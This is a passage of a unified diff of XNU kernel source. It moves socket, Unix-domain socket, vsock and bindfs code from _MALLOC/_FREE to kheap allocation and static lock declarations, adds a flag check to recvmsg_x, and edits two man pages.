-               printf("%s _MALLOC() user_msg_x failed\n", __func__);
+               printf("%s kheap_alloc user_msg_x failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -1720,16 +1720,14 @@ out:
        if (need_drop) {
                file_drop(uap->s);
        }
-       if (umsgp != NULL) {
-               _FREE(umsgp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr);
        if (uiop != NULL) {
                free_uio_array(uiop, uap->cnt);
-               _FREE(uiop, M_TEMP);
-       }
-       if (user_msg_x != NULL) {
-               _FREE(user_msg_x, M_TEMP);
+               kheap_free(KHEAP_TEMP, uiop,
+                   uap->cnt * sizeof(struct uio *));
        }
+       kheap_free(KHEAP_TEMP, user_msg_x,
+           uap->cnt * sizeof(struct user_msghdr_x));
 
        KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0);
 
@@ -1965,9 +1963,7 @@ recvit(struct proc *p, int s, struct user_msghdr *mp, uio_t uiop,
                    &mp->msg_controllen, &mp->msg_flags, so);
        }
 out:
-       if (fromsa) {
-               FREE(fromsa, M_SONAME);
-       }
+       FREE(fromsa, M_SONAME);
        if (control) {
                m_freem(control);
        }
@@ -2199,6 +2195,9 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
 
        KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0);
 
+       size_of_msghdr = IS_64BIT_PROCESS(p) ?
+           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
+
        error = file_socket(uap->s, &so);
        if (error) {
                goto out;
@@ -2208,6 +2207,12 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                error = EBADF;
                goto out;
        }
+       /*
+        * Support only a subset of message flags
+        */
+       if (uap->flags & ~(MSG_PEEK | MSG_WAITALL | MSG_DONTWAIT | MSG_NEEDSA |  MSG_NBIO)) {
+               return EOPNOTSUPP;
+       }
        /*
         * Input parameter range check
         */
@@ -2219,10 +2224,10 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                uap->cnt = somaxrecvmsgx;
        }
 
-       user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),
-           M_TEMP, M_WAITOK | M_ZERO);
+       user_msg_x = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO);
        if (user_msg_x == NULL) {
-               DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -2232,12 +2237,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                error = ENOMEM;
                goto out;
        }
-       size_of_msghdr = IS_64BIT_PROCESS(p) ?
-           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
 
-       umsgp = _MALLOC(uap->cnt * size_of_msghdr, M_TEMP, M_WAITOK | M_ZERO);
+       umsgp = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO);
        if (umsgp == NULL) {
-               DBG_PRINTF("%s _MALLOC() umsgp failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc umsgp failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -2318,7 +2322,7 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                            &recv_msg_elem->controlp : NULL;
 
                        error = so->so_proto->pr_usrreqs->pru_soreceive(so, psa,
-                           auio, (struct mbuf **)0, controlp, &flags);
+                           auio, (struct mbuf **)NULL, controlp, &flags);
                        if (error) {
                                break;
                        }
@@ -2326,17 +2330,18 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                         * We have some data
                         */
                        recv_msg_elem->which |= SOCK_MSG_DATA;
+                       /*
+                        * Set the messages flags for this packet
+                        */
+                       flags &= ~MSG_DONTWAIT;
+                       recv_msg_elem->flags = flags;
                        /*
                         * Stop on partial copy
                         */
-                       if (flags & (MSG_RCVMORE | MSG_TRUNC)) {
+                       if (recv_msg_elem->flags & (MSG_RCVMORE | MSG_TRUNC)) {
                                break;
                        }
                }
-               if ((uap->flags & MSG_DONTWAIT) == 0) {
-                       flags &= ~MSG_DONTWAIT;
-               }
-               uap->flags = flags;
        }
 
        len_after = recv_msg_array_resid(recv_msg_array, uap->cnt);
@@ -2350,9 +2355,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                }
        }
 
-       uiocnt = externalize_recv_msghdr_array(umsgp,
-           IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32,
-           UIO_READ, uap->cnt, user_msg_x, recv_msg_array);
+       uiocnt = externalize_recv_msghdr_array(p, so, umsgp,
+           uap->cnt, user_msg_x, recv_msg_array, &error);
+       if (error != 0) {
+               goto out;
+       }
 
        error = copyout(umsgp, uap->msgp, uap->cnt * size_of_msghdr);
        if (error) {
@@ -2361,40 +2368,14 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
        }
        *retval = (int)(uiocnt);
 
-       for (i = 0; i < uap->cnt; i++) {
-               struct user_msghdr_x *mp = user_msg_x + i;
-               struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
-               struct sockaddr *fromsa = recv_msg_elem->psa;
-
-               if (mp->msg_name) {
-                       error = copyout_sa(fromsa, mp->msg_name,
-                           &mp->msg_namelen);
-                       if (error) {
-                               goto out;
-                       }
-               }
-               if (mp->msg_control) {
-                       error = copyout_control(p, recv_msg_elem->controlp,
-                           mp->msg_control, &mp->msg_controllen,
-                           &mp->msg_flags, so);
-                       if (error) {
-                               goto out;
-                       }
-               }
-       }
 out:
        if (need_drop) {
                file_drop(uap->s);
        }
-       if (umsgp != NULL) {
-               _FREE(umsgp, M_TEMP);
-       }
-       if (recv_msg_array != NULL) {
-               free_recv_msg_array(recv_msg_array, uap->cnt);
-       }
-       if (user_msg_x != NULL) {
-               _FREE(user_msg_x, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr);
+       free_recv_msg_array(recv_msg_array, uap->cnt);
+       kheap_free(KHEAP_TEMP, user_msg_x,
+           uap->cnt * sizeof(struct user_msghdr_x));
 
        KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0);
 
@@ -2633,9 +2614,7 @@ getsockname(__unused struct proc *p, struct getsockname_args *uap,
 gotnothing:
        error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t));
 bad:
-       if (sa) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 out:
        file_drop(uap->fdes);
        return error;
@@ -2722,9 +2701,7 @@ getpeername(__unused struct proc *p, struct getpeername_args *uap,
 gotnothing:
        error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t));
 bad:
-       if (sa) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 out:
        file_drop(uap->fdes);
        return error;
@@ -3092,48 +3069,60 @@ externalize_user_msghdr_array(void *dst, int spacetype, int direction,
 }
 
 u_int
-externalize_recv_msghdr_array(void *dst, int spacetype, int direction,
-    u_int count, const struct user_msghdr_x *src,
-    struct recv_msg_elem *recv_msg_array)
+externalize_recv_msghdr_array(struct proc *p, struct socket *so, void *dst,
+    u_int count, struct user_msghdr_x *src,
+    struct recv_msg_elem *recv_msg_array, int *ret_error)
 {
        u_int i;
-       int seenlast = 0;
        u_int retcnt = 0;
+       int spacetype = IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32;
+
+       *ret_error = 0;
 
        for (i = 0; i < count; i++) {
-               const struct user_msghdr_x *user_msg = src + i;
+               struct user_msghdr_x *user_msg = src + i;
                struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
-               user_ssize_t len;
+               user_ssize_t len = 0;
+               int error;
 
                len = user_msg->msg_datalen - uio_resid(recv_msg_elem->uio);
 
-               if (direction == UIO_READ) {
-                       if ((recv_msg_elem->which & SOCK_MSG_DATA) == 0) {
-                               seenlast = 1;
+               if ((recv_msg_elem->which & SOCK_MSG_DATA)) {
+                       retcnt++;
+
+
+                       if (recv_msg_elem->which & SOCK_MSG_SA) {
+                               error = copyout_sa(recv_msg_elem->psa, user_msg->msg_name,
+                                   &user_msg->msg_namelen);
+                               if (error != 0) {
+                                       *ret_error = error;
+                                       return 0;
+                               }
                        }
-               } else {
-                       if (user_msg->msg_datalen != 0 && len == 0) {
-                               seenlast = 1;
+                       if (recv_msg_elem->which & SOCK_MSG_CONTROL) {
+                               error = copyout_control(p, recv_msg_elem->controlp,
+                                   user_msg->msg_control, &user_msg->msg_controllen,
+                                   &recv_msg_elem->flags, so);
+                               if (error != 0) {
+                                       *ret_error = error;
+                                       return 0;
+                               }
                        }
                }
 
-               if (seenlast == 0) {
-                       retcnt++;
-               }
-
                if (spacetype == UIO_USERSPACE64) {
-                       struct user64_msghdr_x *msghdr64;
-
-                       msghdr64 = ((struct user64_msghdr_x *)dst) + i;
+                       struct user64_msghdr_x *msghdr64 = ((struct user64_msghdr_x *)dst) + i;
 
-                       msghdr64->msg_flags = user_msg->msg_flags;
+                       msghdr64->msg_namelen = user_msg->msg_namelen;
+                       msghdr64->msg_controllen = user_msg->msg_controllen;
+                       msghdr64->msg_flags = recv_msg_elem->flags;
                        msghdr64->msg_datalen = len;
                } else {
-                       struct user32_msghdr_x *msghdr32;
-
-                       msghdr32 = ((struct user32_msghdr_x *)dst) + i;
+                       struct user32_msghdr_x *msghdr32 = ((struct user32_msghdr_x *)dst) + i;
 
-                       msghdr32->msg_flags = user_msg->msg_flags;
+                       msghdr32->msg_namelen = user_msg->msg_namelen;
+                       msghdr32->msg_controllen = user_msg->msg_controllen;
+                       msghdr32->msg_flags = recv_msg_elem->flags;
                        msghdr32->msg_datalen = (user32_size_t)len;
                }
        }
@@ -3201,33 +3190,29 @@ uio_array_is_valid(struct uio **uiop, u_int count)
 struct recv_msg_elem *
 alloc_recv_msg_array(u_int count)
 {
-       struct recv_msg_elem *recv_msg_array;
-
-       recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem),
-           M_TEMP, M_WAITOK | M_ZERO);
-
-       return recv_msg_array;
+       return kheap_alloc(KHEAP_TEMP,
+                  count * sizeof(struct recv_msg_elem), Z_WAITOK | Z_ZERO);
 }
 
 void
 free_recv_msg_array(struct recv_msg_elem *recv_msg_array, u_int count)
 {
-       u_int i;
-
-       for (i = 0; i < count; i++) {
+       if (recv_msg_array == NULL) {
+               return;
+       }
+       for (uint32_t i = 0; i < count; i++) {
                struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
 
                if (recv_msg_elem->uio != NULL) {
                        uio_free(recv_msg_elem->uio);
                }
-               if (recv_msg_elem->psa != NULL) {
-                       _FREE(recv_msg_elem->psa, M_TEMP);
-               }
+               _FREE(recv_msg_elem->psa, M_TEMP);
                if (recv_msg_elem->controlp != NULL) {
                        m_freem(recv_msg_elem->controlp);
                }
        }
-       _FREE(recv_msg_array, M_TEMP);
+       kheap_free(KHEAP_TEMP, recv_msg_array,
+           count * sizeof(struct recv_msg_elem));
 }
 
 
index c363f4cf391473e9932acb2cbf3dbd147e7942ad..5e45f89ee12ee9ecf76f49d61223aa94428b173e 100644 (file)
@@ -110,14 +110,14 @@ ZONE_DECLARE(unp_zone, "unpzone", sizeof(struct unpcb), ZC_NONE);
 static  unp_gen_t unp_gencnt;
 static  u_int unp_count;
 
-static  lck_attr_t             *unp_mtx_attr;
-static  lck_grp_t              *unp_mtx_grp;
-static  lck_grp_attr_t         *unp_mtx_grp_attr;
-static  lck_rw_t                unp_list_mtx;
-
-static  lck_mtx_t               unp_disconnect_lock;
-static  lck_mtx_t               unp_connect_lock;
-static  lck_mtx_t               uipc_lock;
+static  LCK_ATTR_DECLARE(unp_mtx_attr, 0, 0);
+static  LCK_GRP_DECLARE(unp_mtx_grp, "unp_list");
+static  LCK_RW_DECLARE_ATTR(unp_list_mtx, &unp_mtx_grp, &unp_mtx_attr);
+
+static  LCK_MTX_DECLARE_ATTR(unp_disconnect_lock, &unp_mtx_grp, &unp_mtx_attr);
+static  LCK_MTX_DECLARE_ATTR(unp_connect_lock, &unp_mtx_grp, &unp_mtx_attr);
+static  LCK_MTX_DECLARE_ATTR(uipc_lock, &unp_mtx_grp, &unp_mtx_attr);
+
 static  u_int                   disconnect_in_progress;
 
 static struct unp_head unp_shead, unp_dhead;
@@ -917,8 +917,7 @@ unp_attach(struct socket *so)
        }
        bzero(unp, sizeof(*unp));
 
-       lck_mtx_init(&unp->unp_mtx,
-           unp_mtx_grp, unp_mtx_attr);
+       lck_mtx_init(&unp->unp_mtx, &unp_mtx_grp, &unp_mtx_attr);
 
        lck_rw_lock_exclusive(&unp_list_mtx);
        LIST_INIT(&unp->unp_refs);
@@ -1743,8 +1742,8 @@ unp_pcblist SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list),
-           M_TEMP, M_WAITOK);
+       size_t unp_list_len = n * sizeof(*unp_list);
+       unp_list = kheap_alloc(KHEAP_TEMP, unp_list_len, Z_WAITOK);
        if (unp_list == 0) {
                lck_rw_done(&unp_list_mtx);
                return ENOMEM;
@@ -1801,7 +1800,7 @@ unp_pcblist SYSCTL_HANDLER_ARGS
                xug.xug_count = unp_count;
                error = SYSCTL_OUT(req, &xug, sizeof(xug));
        }
-       FREE(unp_list, M_TEMP);
+       kheap_free(KHEAP_TEMP, unp_list, unp_list_len);
        lck_rw_done(&unp_list_mtx);
        return error;
 }
@@ -1872,8 +1871,8 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list),
-           M_TEMP, M_WAITOK);
+       size_t unp_list_size = n * sizeof(*unp_list);
+       unp_list = kheap_alloc(KHEAP_TEMP, unp_list_size, Z_WAITOK);
        if (unp_list == 0) {
                lck_rw_done(&unp_list_mtx);
                return ENOMEM;
@@ -1954,7 +1953,7 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS
                xug.xug_count = unp_count;
                error = SYSCTL_OUT(req, &xug, sizeof(xug));
        }
-       FREE(unp_list, M_TEMP);
+       kheap_free(KHEAP_TEMP, unp_list, unp_list_size);
        lck_rw_done(&unp_list_mtx);
        return error;
 }
@@ -2156,8 +2155,8 @@ unp_externalize(struct mbuf *rights)
        int newfds = (cm->cmsg_len - sizeof(*cm)) / sizeof(int);
        int f, error = 0;
 
-       MALLOC(fileproc_l, struct fileproc **,
-           newfds * sizeof(struct fileproc *), M_TEMP, M_WAITOK);
+       fileproc_l = kheap_alloc(KHEAP_TEMP,
+           newfds * sizeof(struct fileproc *), Z_WAITOK);
        if (fileproc_l == NULL) {
                error = ENOMEM;
                goto discard;
@@ -2222,9 +2221,8 @@ unp_externalize(struct mbuf *rights)
        }
 
 discard:
-       if (fileproc_l != NULL) {
-               FREE(fileproc_l, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, fileproc_l,
+           newfds * sizeof(struct fileproc *));
        if (error) {
                for (i = 0; i < newfds; i++) {
                        unp_discard(*rp, p);
@@ -2240,20 +2238,6 @@ unp_init(void)
        _CASSERT(UIPC_MAX_CMSG_FD >= (MCLBYTES / sizeof(int)));
        LIST_INIT(&unp_dhead);
        LIST_INIT(&unp_shead);
-
-       /*
-        * allocate lock group attribute and group for udp pcb mutexes
-        */
-       unp_mtx_grp_attr = lck_grp_attr_alloc_init();
-
-       unp_mtx_grp = lck_grp_alloc_init("unp_list", unp_mtx_grp_attr);
-
-       unp_mtx_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&uipc_lock, unp_mtx_grp, unp_mtx_attr);
-       lck_rw_init(&unp_list_mtx, unp_mtx_grp, unp_mtx_attr);
-       lck_mtx_init(&unp_disconnect_lock, unp_mtx_grp, unp_mtx_attr);
-       lck_mtx_init(&unp_connect_lock, unp_mtx_grp, unp_mtx_attr);
 }
 
 #ifndef MIN
@@ -2482,8 +2466,8 @@ unp_gc(void)
         *
         * 91/09/19, bsy@cs.cmu.edu
         */
-       MALLOC(extra_ref, struct fileglob **, nfiles * sizeof(struct fileglob *),
-           M_TEMP, M_WAITOK);
+       size_t extra_ref_size = nfiles * sizeof(struct fileglob *);
+       extra_ref = kheap_alloc(KHEAP_TEMP, extra_ref_size, Z_WAITOK);
        if (extra_ref == NULL) {
                goto bail;
        }
@@ -2539,7 +2523,8 @@ unp_gc(void)
                fg_drop(PROC_NULL, *fpp);
        }
 
-       FREE(extra_ref, M_TEMP);
+       kheap_free(KHEAP_TEMP, extra_ref, extra_ref_size);
+
 bail:
        lck_mtx_lock(&uipc_lock);
        unp_gcing = 0;
@@ -2708,7 +2693,7 @@ unp_unlock(struct socket *so, int refcount, void * lr)
 
                lck_mtx_unlock(mutex_held);
 
-               lck_mtx_destroy(&unp->unp_mtx, unp_mtx_grp);
+               lck_mtx_destroy(&unp->unp_mtx, &unp_mtx_grp);
                zfree(unp_zone, unp);
 
                unp_gc();
index ae118349db5a404810c8050499b189c2b879b30a..2f3e69a71990062b8ea796e01bf1c871b3153e88 100644 (file)
@@ -50,6 +50,7 @@
 static struct vsock_transport * _Atomic the_vsock_transport = NULL;
 static ZONE_DECLARE(vsockpcb_zone, "vsockpcbzone",
     sizeof(struct vsockpcb), ZC_NONE);
+static LCK_GRP_DECLARE(vsock_lock_grp, "vsock");
 static struct vsockpcbinfo vsockinfo;
 
 static uint32_t vsock_sendspace = VSOCK_MAX_PACKET_SIZE * 8;
@@ -70,7 +71,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst)
        struct vsockpcb *match = NULL;
        struct vsockpcb *pcb = NULL;
 
-       lck_rw_lock_shared(vsockinfo.bound_lock);
+       lck_rw_lock_shared(&vsockinfo.bound_lock);
        LIST_FOREACH(pcb, &vsockinfo.bound, bound) {
                // Source cid and port must match. Only destination port must match. (Allows for a changing CID during migration)
                socket_lock(pcb->so, 1);
@@ -89,7 +90,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst)
                socket_lock(match->so, 1);
                preferred = match;
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return preferred;
 }
@@ -111,7 +112,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo
        struct vsockpcb *pcb_match = NULL;
 
        socket_unlock(pcb->so, 0);
-       lck_rw_lock_exclusive(vsockinfo.bound_lock);
+       lck_rw_lock_exclusive(&vsockinfo.bound_lock);
        LIST_FOREACH(pcb_match, &vsockinfo.bound, bound) {
                socket_lock(pcb_match->so, 1);
                if (pcb == pcb_match ||
@@ -130,7 +131,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo
                pcb->remote_address = (struct vsock_address) { .cid = remote_cid, .port = remote_port };
                LIST_INSERT_HEAD(&vsockinfo.bound, pcb, bound);
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return taken ? EADDRINUSE : 0;
 }
@@ -225,10 +226,10 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked)
 
        if (!is_locked) {
                socket_unlock(pcb->so, 0);
-               lck_rw_lock_exclusive(vsockinfo.bound_lock);
+               lck_rw_lock_exclusive(&vsockinfo.bound_lock);
                socket_lock(pcb->so, 0);
                if (!pcb->bound.le_prev) {
-                       lck_rw_done(vsockinfo.bound_lock);
+                       lck_rw_done(&vsockinfo.bound_lock);
                        return;
                }
        }
@@ -238,7 +239,7 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked)
        pcb->bound.le_prev = NULL;
 
        if (!is_locked) {
-               lck_rw_done(vsockinfo.bound_lock);
+               lck_rw_done(&vsockinfo.bound_lock);
        }
 }
 
@@ -250,12 +251,12 @@ vsock_new_sockaddr(struct vsock_address *address)
        }
 
        struct sockaddr_vm *addr;
-       MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, M_WAITOK);
+       MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME,
+           M_WAITOK | M_ZERO);
        if (!addr) {
                return NULL;
        }
 
-       bzero(addr, sizeof(*addr));
        addr->svm_len = sizeof(*addr);
        addr->svm_family = AF_VSOCK;
        addr->svm_port = address->port;
@@ -629,7 +630,7 @@ vsock_reset_transport(struct vsock_transport *transport)
        struct vsockpcb *pcb = NULL;
        struct vsockpcb *tmp_pcb = NULL;
 
-       lck_rw_lock_exclusive(vsockinfo.bound_lock);
+       lck_rw_lock_exclusive(&vsockinfo.bound_lock);
        LIST_FOREACH_SAFE(pcb, &vsockinfo.bound, bound, tmp_pcb) {
                // Disconnect this transport's sockets. Listen and bind sockets must stay alive.
                socket_lock(pcb->so, 1);
@@ -641,7 +642,7 @@ vsock_reset_transport(struct vsock_transport *transport)
                }
                socket_unlock(pcb->so, 1);
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return error;
 }
@@ -722,10 +723,10 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
        }
 
        // Get the generation count and the count of all vsock sockets.
-       lck_rw_lock_shared(vsockinfo.all_lock);
+       lck_rw_lock_shared(&vsockinfo.all_lock);
        uint64_t n = vsockinfo.all_pcb_count;
        vsock_gen_t gen_count = vsockinfo.vsock_gencnt;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        const size_t xpcb_len = sizeof(struct xvsockpcb);
        struct xvsockpgen xvg;
@@ -758,7 +759,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       lck_rw_lock_shared(vsockinfo.all_lock);
+       lck_rw_lock_shared(&vsockinfo.all_lock);
 
        n = 0;
        struct vsockpcb *pcb = NULL;
@@ -803,7 +804,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
        // Update the generation count to match the sockets being returned.
        gen_count = vsockinfo.vsock_gencnt;
 
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        if (!error) {
                /*
@@ -886,11 +887,11 @@ vsock_attach(struct socket *so, int proto, struct proc *p)
        }
 
        // Add to the list of all vsock sockets.
-       lck_rw_lock_exclusive(vsockinfo.all_lock);
+       lck_rw_lock_exclusive(&vsockinfo.all_lock);
        TAILQ_INSERT_TAIL(&vsockinfo.all, pcb, all);
        vsockinfo.all_pcb_count++;
        pcb->vsock_gencnt = ++vsockinfo.vsock_gencnt;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        return 0;
 }
@@ -950,13 +951,13 @@ vsock_detach(struct socket *so)
        }
 
        // Remove from the list of all vsock sockets.
-       lck_rw_lock_exclusive(vsockinfo.all_lock);
+       lck_rw_lock_exclusive(&vsockinfo.all_lock);
        TAILQ_REMOVE(&vsockinfo.all, pcb, all);
        pcb->all.tqe_next = NULL;
        pcb->all.tqe_prev = NULL;
        vsockinfo.all_pcb_count--;
        vsockinfo.vsock_gencnt++;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        // Deallocate any resources.
        zfree(vsockpcb_zone, pcb);
@@ -1380,15 +1381,9 @@ vsock_init(struct protosw *pp, struct domain *dp)
        }
 
        // Setup VSock protocol info struct.
-       vsockinfo.vsock_lock_grp_attr = lck_grp_attr_alloc_init();
-       vsockinfo.vsock_lock_grp = lck_grp_alloc_init("vsock", vsockinfo.vsock_lock_grp_attr);
-       vsockinfo.vsock_lock_attr = lck_attr_alloc_init();
-       if ((vsockinfo.all_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL ||
-           (vsockinfo.bound_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL) {
-               panic("%s: unable to allocate PCB lock\n", __func__);
-               /* NOTREACHED */
-       }
-       lck_mtx_init(&vsockinfo.port_lock, vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr);
+       lck_rw_init(&vsockinfo.all_lock, &vsock_lock_grp, LCK_ATTR_NULL);
+       lck_rw_init(&vsockinfo.bound_lock, &vsock_lock_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&vsockinfo.port_lock, &vsock_lock_grp, LCK_ATTR_NULL);
        TAILQ_INIT(&vsockinfo.all);
        LIST_INIT(&vsockinfo.bound);
        vsockinfo.last_port = VMADDR_PORT_ANY;
index 114321e0d15400f91c2ef897f0f336925ebb17d5..56b8d0a9296d7762afdc81619ecbccaff249dda5 100644 (file)
@@ -44,7 +44,7 @@ The cloned file
 .Fa dst
 shares its data blocks with the
 .Fa src
-file but has its own copy of attributes, extended attributes and ACL's which are identical to
+file but has its own copy of attributes and extended attributes which are identical to
 those of the named file
 .Fa src
 with the exceptions listed below
index 586707fa6596aaf8f53bb14758c5c4b64ae24766..98e6e25bb3c8e5bc2854ee1c4e11fbb164a09395 100644 (file)
@@ -208,6 +208,8 @@ may fail with one of the following errors:
 The caller is not the super-user, and the
 .Nm mount()
 was not done by the user.
+.It Bq Er EPERM
+A system policy denied the operation.
 .It Bq Er ENOTDIR
 A component of the path is not a directory.
 .It Bq Er EINVAL
index 58b67705ef87c7edb9460831e290a9ca9c5c3a0d..2b4500f049b3be37290de67a4b84d24a18a7cfec 100644 (file)
 #define BIND_NHASH(vp) (&bind_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & bind_hash_mask])
 
 static LIST_HEAD(bind_node_hashhead, bind_node) * bind_node_hashtbl;
-static lck_mtx_t bind_hashmtx;
-static lck_attr_t * bind_hashlck_attr;
-static lck_grp_t * bind_hashlck_grp;
-static lck_grp_attr_t * bind_hashlck_grp_attr;
+static LCK_GRP_DECLARE(bind_hashlck_grp, "com.apple.filesystems.bindfs");
+static LCK_MTX_DECLARE(bind_hashmtx, &bind_hashlck_grp);
 static u_long bind_hash_mask;
 
 /*  xnu doesn't have hashes built into vnodes. This mimics what freebsd does
@@ -94,28 +92,6 @@ static int vnsz2log = 9;
 
 static int bind_hashins(struct mount *, struct bind_node *, struct vnode **);
 
-int
-bindfs_init_lck(lck_mtx_t * lck)
-{
-       int error = 1;
-       if (lck && bind_hashlck_grp && bind_hashlck_attr) {
-               lck_mtx_init(lck, bind_hashlck_grp, bind_hashlck_attr);
-               error = 0;
-       }
-       return error;
-}
-
-int
-bindfs_destroy_lck(lck_mtx_t * lck)
-{
-       int error = 1;
-       if (lck && bind_hashlck_grp) {
-               lck_mtx_destroy(lck, bind_hashlck_grp);
-               error = 0;
-       }
-       return error;
-}
-
 /*
  * Initialise cache headers
  */
@@ -124,43 +100,15 @@ bindfs_init(__unused struct vfsconf * vfsp)
 {
        BINDFSDEBUG("%s\n", __FUNCTION__);
 
-       /* assuming for now that this happens immediately and by default after fs
-        * installation */
-       bind_hashlck_grp_attr = lck_grp_attr_alloc_init();
-       if (bind_hashlck_grp_attr == NULL) {
-               goto error;
-       }
-       bind_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.bindfs", bind_hashlck_grp_attr);
-       if (bind_hashlck_grp == NULL) {
-               goto error;
-       }
-       bind_hashlck_attr = lck_attr_alloc_init();
-       if (bind_hashlck_attr == NULL) {
-               goto error;
-       }
-
        bind_node_hashtbl = hashinit(BIND_HASH_SIZE, M_TEMP, &bind_hash_mask);
        if (bind_node_hashtbl == NULL) {
                goto error;
        }
-       lck_mtx_init(&bind_hashmtx, bind_hashlck_grp, bind_hashlck_attr);
 
        BINDFSDEBUG("%s finished\n", __FUNCTION__);
        return 0;
 error:
        printf("BINDFS: failed to initialize globals\n");
-       if (bind_hashlck_grp_attr) {
-               lck_grp_attr_free(bind_hashlck_grp_attr);
-               bind_hashlck_grp_attr = NULL;
-       }
-       if (bind_hashlck_grp) {
-               lck_grp_free(bind_hashlck_grp);
-               bind_hashlck_grp = NULL;
-       }
-       if (bind_hashlck_attr) {
-               lck_attr_free(bind_hashlck_attr);
-               bind_hashlck_attr = NULL;
-       }
        return KERN_FAILURE;
 }
 
@@ -169,20 +117,7 @@ bindfs_destroy(void)
 {
        /* This gets called when the fs is uninstalled, there wasn't an exact
         * equivalent in vfsops */
-       lck_mtx_destroy(&bind_hashmtx, bind_hashlck_grp);
        hashdestroy(bind_node_hashtbl, M_TEMP, bind_hash_mask);
-       if (bind_hashlck_grp_attr) {
-               lck_grp_attr_free(bind_hashlck_grp_attr);
-               bind_hashlck_grp_attr = NULL;
-       }
-       if (bind_hashlck_grp) {
-               lck_grp_free(bind_hashlck_grp);
-               bind_hashlck_grp = NULL;
-       }
-       if (bind_hashlck_attr) {
-               lck_attr_free(bind_hashlck_attr);
-               bind_hashlck_attr = NULL;
-       }
        return 0;
 }
 
index 2290bd8902ea20441ebcb613afa83b454805c8d5..726337c1e2b4b16e4332e1cb3d7b6570821eb309 100644 (file)
@@ -246,11 +246,10 @@ notdot:
                if (error == 0) {
                        *ap->a_vpp = vp;
                }
-       }
-
-       /* if we got lvp, drop the iocount from VNOP_LOOKUP */
-       if (lvp != NULL) {
-               vnode_put(lvp);
+               /* if we got lvp, drop the iocount from VNOP_LOOKUP */
+               if (lvp != NULL) {
